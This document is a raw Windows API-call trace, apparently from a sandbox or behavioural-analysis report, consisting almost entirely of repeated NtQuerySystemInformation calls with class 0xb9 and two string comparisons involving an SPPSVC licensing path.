NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe410, Length=0x20, ResultLength=0x0) [0210.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe470, Length=0x50, ResultLength=0x0) [0210.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe470, Length=0x50, ResultLength=0x0) [0210.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe470, Length=0x50, ResultLength=0x0) [0210.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe360, Length=0x50, ResultLength=0x0) [0210.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe360, Length=0x50, ResultLength=0x0) [0210.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe360, Length=0x50, ResultLength=0x0) [0210.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe360, Length=0x50, ResultLength=0x0) [0210.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe290, Length=0x38, ResultLength=0x0) [0210.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe0c0, Length=0x28, ResultLength=0x0) [0210.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe0c0, Length=0x28, ResultLength=0x0) [0210.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe0c0, Length=0x28, ResultLength=0x0) [0210.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe130, Length=0x28, ResultLength=0x0) [0210.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe290, Length=0x38, ResultLength=0x0) [0210.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe1b0, Length=0x28, ResultLength=0x0) [0210.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe1b0, Length=0x28, ResultLength=0x0) [0210.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe290, Length=0x38, ResultLength=0x0) [0210.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe110, Length=0x20, ResultLength=0x0) [0210.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe090, Length=0x20, ResultLength=0x0) [0210.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe090, Length=0x20, ResultLength=0x0) [0210.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe090, Length=0x20, ResultLength=0x0) [0210.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe290, Length=0x38, ResultLength=0x0) [0210.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe110, Length=0x20, ResultLength=0x0) [0210.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe0a0, Length=0x20, ResultLength=0x0) [0210.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe0a0, Length=0x20, ResultLength=0x0) [0210.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe470, Length=0x50, ResultLength=0x0) [0210.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe470, Length=0x50, ResultLength=0x0) [0210.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe470, Length=0x50, ResultLength=0x0) [0210.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe360, Length=0x50, ResultLength=0x0) [0210.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe360, Length=0x50, ResultLength=0x0) [0210.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe360, Length=0x50, ResultLength=0x0) [0210.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe360, Length=0x50, ResultLength=0x0) [0210.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe290, Length=0x38, ResultLength=0x0) [0210.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe0c0, Length=0x28, ResultLength=0x0) [0210.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe0c0, Length=0x28, ResultLength=0x0) [0210.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe0c0, Length=0x28, ResultLength=0x0) [0210.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe130, Length=0x28, ResultLength=0x0) [0210.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe290, Length=0x38, ResultLength=0x0) [0210.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe1b0, Length=0x28, ResultLength=0x0) [0210.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe1b0, Length=0x28, ResultLength=0x0) [0210.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe290, Length=0x38, ResultLength=0x0) [0210.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe110, Length=0x20, ResultLength=0x0) [0210.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe090, Length=0x20, ResultLength=0x0) [0210.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe090, Length=0x20, ResultLength=0x0) [0210.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe090, Length=0x20, ResultLength=0x0) [0210.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe290, Length=0x38, ResultLength=0x0) [0210.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe110, Length=0x20, ResultLength=0x0) [0210.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe0a0, Length=0x20, ResultLength=0x0) [0210.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe0a0, Length=0x20, ResultLength=0x0) [0210.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe520, Length=0x50, ResultLength=0x0) [0210.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4a0, Length=0x28, ResultLength=0x0) [0210.322] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0210.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe520, Length=0x50, ResultLength=0x0) [0210.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe520, Length=0x50, ResultLength=0x0) [0210.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe520, Length=0x50, ResultLength=0x0) [0210.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe450, Length=0x38, ResultLength=0x0) [0210.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe280, Length=0x28, ResultLength=0x0) [0210.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe280, Length=0x28, ResultLength=0x0) [0210.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe280, Length=0x28, ResultLength=0x0) [0210.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe2f0, Length=0x28, ResultLength=0x0) [0210.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe450, Length=0x38, ResultLength=0x0) [0210.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe370, Length=0x28, ResultLength=0x0) [0210.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe370, Length=0x28, ResultLength=0x0) [0210.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe210, Length=0x20, ResultLength=0x0) [0210.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe190, Length=0x20, ResultLength=0x0) [0210.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe190, Length=0x20, ResultLength=0x0) [0210.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe190, Length=0x20, ResultLength=0x0) [0210.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe450, Length=0x38, ResultLength=0x0) [0210.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe450, Length=0x38, ResultLength=0x0) [0210.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe2d0, Length=0x20, ResultLength=0x0) [0210.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe260, Length=0x20, ResultLength=0x0) [0210.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe260, Length=0x20, ResultLength=0x0) [0210.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe520, Length=0x50, ResultLength=0x0) [0210.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4a0, Length=0x28, ResultLength=0x0) [0210.337] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0210.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe520, Length=0x50, ResultLength=0x0) [0210.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe520, Length=0x50, ResultLength=0x0) [0210.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe520, Length=0x50, ResultLength=0x0) [0210.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe450, Length=0x38, ResultLength=0x0) [0210.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe280, Length=0x28, ResultLength=0x0) [0210.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe280, Length=0x28, ResultLength=0x0) [0210.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe280, Length=0x28, ResultLength=0x0) [0210.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe2f0, Length=0x28, ResultLength=0x0) [0210.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe450, Length=0x38, ResultLength=0x0) [0210.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe370, Length=0x28, ResultLength=0x0) [0210.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe370, Length=0x28, ResultLength=0x0) [0210.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe210, Length=0x20, ResultLength=0x0) [0210.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe190, Length=0x20, ResultLength=0x0) [0210.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe190, Length=0x20, ResultLength=0x0) [0210.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 